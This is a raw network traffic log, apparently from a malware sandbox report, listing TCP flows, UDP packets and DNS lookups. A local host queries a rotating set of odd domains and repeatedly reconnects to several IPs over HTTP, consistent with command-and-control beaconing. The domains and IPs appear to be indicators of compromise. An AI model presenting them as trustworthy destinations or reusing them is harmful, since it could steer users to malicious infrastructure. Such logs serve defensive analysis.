Jan 10, 2025 16:43:30.730691910 CET	80	49998	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:30.730741978 CET	49998	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:30.730791092 CET	49998	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:31.801898003 CET	49998	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:32.822720051 CET	49999	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:32.827558041 CET	80	49999	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:32.827636957 CET	49999	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:32.844831944 CET	49999	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:32.849649906 CET	80	49999	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:32.849843025 CET	80	49999	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:33.313520908 CET	80	49999	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:33.313556910 CET	80	49999	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:33.313570023 CET	80	49999	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:33.321105003 CET	49999	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:34.348748922 CET	49999	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:35.367619991 CET	50000	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:35.373186111 CET	80	50000	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:35.373378038 CET	50000	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:35.382718086 CET	50000	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:35.388248920 CET	80	50000	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:35.832009077 CET	80	50000	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:35.832027912 CET	80	50000	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:35.832063913 CET	80	50000	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:35.832142115 CET	50000	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:35.832230091 CET	50000	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:35.835088968 CET	50000	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:35.839858055 CET	80	50000	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:41.104829073 CET	50001	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:41.109647989 CET	80	50001	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:41.109739065 CET	50001	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:41.124835014 CET	50001	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:41.129688978 CET	80	50001	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:41.664463043 CET	80	50001	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:41.665841103 CET	50001	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:42.630012035 CET	50001	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:42.634960890 CET	80	50001	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:43.650852919 CET	50002	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:43.656060934 CET	80	50002	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:43.660192013 CET	50002	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:43.675221920 CET	50002	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:43.680223942 CET	80	50002	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:44.195838928 CET	80	50002	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:44.195904016 CET	50002	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:45.177004099 CET	50002	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:45.181900024 CET	80	50002	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:46.195758104 CET	50003	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:46.200769901 CET	80	50003	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:46.200855017 CET	50003	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:46.216811895 CET	50003	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:46.221782923 CET	80	50003	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:46.222004890 CET	80	50003	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:46.727716923 CET	80	50003	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:46.727808952 CET	50003	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:47.724721909 CET	50003	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:47.729629993 CET	80	50003	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:48.743374109 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:48.748389959 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:48.748475075 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:48.758433104 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:48.764050007 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757118940 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757150888 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757311106 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757329941 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757340908 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757356882 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757369995 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757383108 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.757481098 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.757481098 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.801924944 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.801944017 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.801956892 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.801970005 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.801984072 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.802154064 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.802148104 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.802459002 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.848157883 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.848172903 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.848185062 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.848196983 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.848212004 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.848462105 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.848495007 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.849003077 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.891244888 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.891264915 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.891278982 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.891293049 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.891397953 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.891432047 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.891520977 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.936240911 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.936266899 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.936280012 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.936292887 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.936307907 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.936454058 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.936455011 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.936517000 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.936573982 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:49.936909914 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.940824986 CET	50004	80	192.168.2.5	208.91.197.27
Jan 10, 2025 16:43:49.955193996 CET	80	50004	208.91.197.27	192.168.2.5
Jan 10, 2025 16:43:55.024286032 CET	50005	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:55.029189110 CET	80	50005	136.243.64.147	192.168.2.5
Jan 10, 2025 16:43:55.029263973 CET	50005	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:55.045595884 CET	50005	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:55.050419092 CET	80	50005	136.243.64.147	192.168.2.5
Jan 10, 2025 16:43:55.713295937 CET	80	50005	136.243.64.147	192.168.2.5
Jan 10, 2025 16:43:55.713423967 CET	80	50005	136.243.64.147	192.168.2.5
Jan 10, 2025 16:43:55.714507103 CET	50005	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:56.558036089 CET	50005	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:57.575344086 CET	50006	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:57.580380917 CET	80	50006	136.243.64.147	192.168.2.5
Jan 10, 2025 16:43:57.580825090 CET	50006	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:57.594106913 CET	50006	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:57.599090099 CET	80	50006	136.243.64.147	192.168.2.5
Jan 10, 2025 16:43:58.233299971 CET	80	50006	136.243.64.147	192.168.2.5
Jan 10, 2025 16:43:58.233316898 CET	80	50006	136.243.64.147	192.168.2.5
Jan 10, 2025 16:43:58.233396053 CET	50006	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:43:59.100785017 CET	50006	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:00.117265940 CET	50007	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:00.122184992 CET	80	50007	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:00.122288942 CET	50007	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:00.135642052 CET	50007	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:00.142791033 CET	80	50007	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:00.142817974 CET	80	50007	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:00.768687010 CET	80	50007	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:00.768733025 CET	80	50007	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:00.768784046 CET	50007	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:01.677017927 CET	50007	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:02.680207014 CET	50008	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:02.685291052 CET	80	50008	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:02.685369015 CET	50008	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:02.694971085 CET	50008	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:02.699801922 CET	80	50008	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:03.378036022 CET	80	50008	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:03.378058910 CET	80	50008	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:03.381006956 CET	50008	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:03.383667946 CET	50008	80	192.168.2.5	136.243.64.147
Jan 10, 2025 16:44:03.388540030 CET	80	50008	136.243.64.147	192.168.2.5
Jan 10, 2025 16:44:16.527679920 CET	50009	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:16.532589912 CET	80	50009	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:16.532665968 CET	50009	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:16.552077055 CET	50009	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:16.556962967 CET	80	50009	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:17.105659008 CET	80	50009	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:17.106811047 CET	80	50009	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:17.106873035 CET	50009	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:18.067893982 CET	50009	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:19.090053082 CET	50010	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:19.094944954 CET	80	50010	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:19.095016003 CET	50010	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:19.122030973 CET	50010	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:19.127573013 CET	80	50010	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:19.551476955 CET	80	50010	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:19.551714897 CET	80	50010	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:19.551968098 CET	50010	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:20.630057096 CET	50010	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:21.651386023 CET	50011	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:21.656356096 CET	80	50011	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:21.656999111 CET	50011	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:21.671034098 CET	50011	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:21.675959110 CET	80	50011	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:21.676073074 CET	80	50011	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:22.126920938 CET	80	50011	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:22.127810001 CET	80	50011	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:22.133759022 CET	50011	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:23.176884890 CET	50011	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:24.195431948 CET	50012	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:24.200282097 CET	80	50012	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:24.200361013 CET	50012	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:24.208802938 CET	50012	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:24.213689089 CET	80	50012	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:24.660492897 CET	80	50012	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:24.662174940 CET	80	50012	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:24.662228107 CET	50012	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:24.663383961 CET	50012	80	192.168.2.5	104.21.48.1
Jan 10, 2025 16:44:24.668106079 CET	80	50012	104.21.48.1	192.168.2.5
Jan 10, 2025 16:44:38.603559017 CET	50013	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:38.608473063 CET	80	50013	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:38.608558893 CET	50013	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:38.625178099 CET	50013	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:38.630075932 CET	80	50013	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:39.498950005 CET	80	50013	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:39.498975992 CET	80	50013	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:39.499290943 CET	50013	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:40.130000114 CET	50013	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:41.149365902 CET	50014	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:41.154324055 CET	80	50014	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:41.154416084 CET	50014	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:41.171515942 CET	50014	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:41.176393986 CET	80	50014	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:42.068195105 CET	80	50014	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:42.068249941 CET	80	50014	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:42.073025942 CET	50014	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:42.676995039 CET	50014	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:43.696980000 CET	50015	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:43.702419043 CET	80	50015	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:43.702595949 CET	50015	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:43.720895052 CET	50015	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:43.725814104 CET	80	50015	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:43.726012945 CET	80	50015	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:44.612195969 CET	80	50015	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:44.612248898 CET	80	50015	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:44.612293959 CET	50015	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:45.224883080 CET	50015	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:46.243046045 CET	50016	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:46.247962952 CET	80	50016	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:46.248055935 CET	50016	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:46.257652044 CET	50016	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:46.262479067 CET	80	50016	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:47.149096012 CET	80	50016	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:47.149157047 CET	80	50016	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:47.149247885 CET	50016	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:47.159112930 CET	50016	80	192.168.2.5	134.122.133.80
Jan 10, 2025 16:44:47.164072990 CET	80	50016	134.122.133.80	192.168.2.5
Jan 10, 2025 16:44:52.223949909 CET	50017	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:52.228899002 CET	80	50017	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:52.228976011 CET	50017	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:52.243621111 CET	50017	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:52.248503923 CET	80	50017	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:52.907298088 CET	80	50017	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:52.908164978 CET	80	50017	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:52.908231020 CET	50017	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:53.755213022 CET	50017	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:54.774497986 CET	50018	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:54.782955885 CET	80	50018	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:54.783044100 CET	50018	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:54.800040007 CET	50018	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:54.805109024 CET	80	50018	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:55.404256105 CET	80	50018	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:55.404421091 CET	80	50018	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:55.411921024 CET	50018	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:56.301887989 CET	50018	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:57.323079109 CET	50019	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:57.328021049 CET	80	50019	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:57.328241110 CET	50019	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:57.344916105 CET	50019	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:57.349816084 CET	80	50019	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:57.349905968 CET	80	50019	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:57.939332008 CET	80	50019	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:57.939920902 CET	80	50019	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:57.944992065 CET	50019	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:58.848802090 CET	50019	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:59.872101068 CET	50020	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:59.877043962 CET	80	50020	93.127.192.201	192.168.2.5
Jan 10, 2025 16:44:59.880062103 CET	50020	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:59.897289991 CET	50020	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:44:59.902285099 CET	80	50020	93.127.192.201	192.168.2.5
Jan 10, 2025 16:45:00.490494013 CET	80	50020	93.127.192.201	192.168.2.5
Jan 10, 2025 16:45:00.493026972 CET	80	50020	93.127.192.201	192.168.2.5
Jan 10, 2025 16:45:00.493092060 CET	50020	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:45:00.495496035 CET	50020	80	192.168.2.5	93.127.192.201
Jan 10, 2025 16:45:00.500266075 CET	80	50020	93.127.192.201	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:41:46.649641991 CET	50182	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:41:47.074762106 CET	53	50182	1.1.1.1	192.168.2.5
Jan 10, 2025 16:42:03.064502001 CET	51153	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:42:03.124723911 CET	53	51153	1.1.1.1	192.168.2.5
Jan 10, 2025 16:42:16.430968046 CET	51963	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:42:16.440654993 CET	53	51963	1.1.1.1	192.168.2.5
Jan 10, 2025 16:42:24.519157887 CET	49277	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:42:24.530720949 CET	53	49277	1.1.1.1	192.168.2.5
Jan 10, 2025 16:42:38.086899996 CET	51931	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:42:38.105012894 CET	53	51931	1.1.1.1	192.168.2.5
Jan 10, 2025 16:42:52.430757999 CET	54143	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:42:52.636511087 CET	53	54143	1.1.1.1	192.168.2.5
Jan 10, 2025 16:43:06.027600050 CET	55188	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:43:06.045205116 CET	53	55188	1.1.1.1	192.168.2.5
Jan 10, 2025 16:43:19.383863926 CET	61594	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:43:19.392745018 CET	53	61594	1.1.1.1	192.168.2.5
Jan 10, 2025 16:43:27.446192980 CET	50565	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:43:27.722896099 CET	53	50565	1.1.1.1	192.168.2.5
Jan 10, 2025 16:43:40.853557110 CET	65357	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:43:41.100325108 CET	53	65357	1.1.1.1	192.168.2.5
Jan 10, 2025 16:43:54.947181940 CET	64241	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:43:55.021745920 CET	53	64241	1.1.1.1	192.168.2.5
Jan 10, 2025 16:44:08.429542065 CET	54582	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:44:08.444703102 CET	53	54582	1.1.1.1	192.168.2.5
Jan 10, 2025 16:44:16.509423018 CET	50539	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:44:16.524630070 CET	53	50539	1.1.1.1	192.168.2.5
Jan 10, 2025 16:44:29.682984114 CET	58198	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:44:29.692915916 CET	53	58198	1.1.1.1	192.168.2.5
Jan 10, 2025 16:44:37.760880947 CET	53345	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:44:38.600763083 CET	53	53345	1.1.1.1	192.168.2.5
Jan 10, 2025 16:44:52.168893099 CET	62913	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:44:52.220618963 CET	53	62913	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 16:41:46.649641991 CET	192.168.2.5	1.1.1.1	0x7e26	Standard query (0)	www.f5jh81t3k1w8.sbs	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:03.064502001 CET	192.168.2.5	1.1.1.1	0x9099	Standard query (0)	www.lmueller.dev	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:16.430968046 CET	192.168.2.5	1.1.1.1	0x723f	Standard query (0)	www.valdevez.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:24.519157887 CET	192.168.2.5	1.1.1.1	0x46bc	Standard query (0)	www.valuault.store	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:38.086899996 CET	192.168.2.5	1.1.1.1	0x6b11	Standard query (0)	www.odvfr.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:52.430757999 CET	192.168.2.5	1.1.1.1	0xd240	Standard query (0)	www.fersigorta.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:06.027600050 CET	192.168.2.5	1.1.1.1	0xfc63	Standard query (0)	www.vh5g.sbs	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:19.383863926 CET	192.168.2.5	1.1.1.1	0xd75	Standard query (0)	www.envisionmedia.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:27.446192980 CET	192.168.2.5	1.1.1.1	0x74b6	Standard query (0)	www.marketyemen.holdings	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:40.853557110 CET	192.168.2.5	1.1.1.1	0xcca9	Standard query (0)	www.deacapalla.online	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:54.947181940 CET	192.168.2.5	1.1.1.1	0x26e3	Standard query (0)	www.100millionjobs.africa	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:08.429542065 CET	192.168.2.5	1.1.1.1	0xaa5d	Standard query (0)	www.elettrocoltura.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:16.509423018 CET	192.168.2.5	1.1.1.1	0x8c82	Standard query (0)	www.axis138ae.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:29.682984114 CET	192.168.2.5	1.1.1.1	0xe53f	Standard query (0)	www.reynamart.store	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:37.760880947 CET	192.168.2.5	1.1.1.1	0x8681	Standard query (0)	www.x3kwqc5tye4vl90y.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:52.168893099 CET	192.168.2.5	1.1.1.1	0x628	Standard query (0)	www.al-madinatraders.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 16:41:47.074762106 CET	1.1.1.1	192.168.2.5	0x7e26	No error (0)	www.f5jh81t3k1w8.sbs		154.213.39.66	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:03.124723911 CET	1.1.1.1	192.168.2.5	0x9099	No error (0)	www.lmueller.dev		46.38.243.234	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:16.440654993 CET	1.1.1.1	192.168.2.5	0x723f	Name error (3)	www.valdevez.net	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:24.530720949 CET	1.1.1.1	192.168.2.5	0x46bc	No error (0)	www.valuault.store		209.74.79.42	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:38.105012894 CET	1.1.1.1	192.168.2.5	0x6b11	No error (0)	www.odvfr.info		47.254.140.255	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:42:52.636511087 CET	1.1.1.1	192.168.2.5	0xd240	No error (0)	www.fersigorta.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:42:52.636511087 CET	1.1.1.1	192.168.2.5	0xd240	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:42:52.636511087 CET	1.1.1.1	192.168.2.5	0xd240	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:06.045205116 CET	1.1.1.1	192.168.2.5	0xfc63	No error (0)	www.vh5g.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
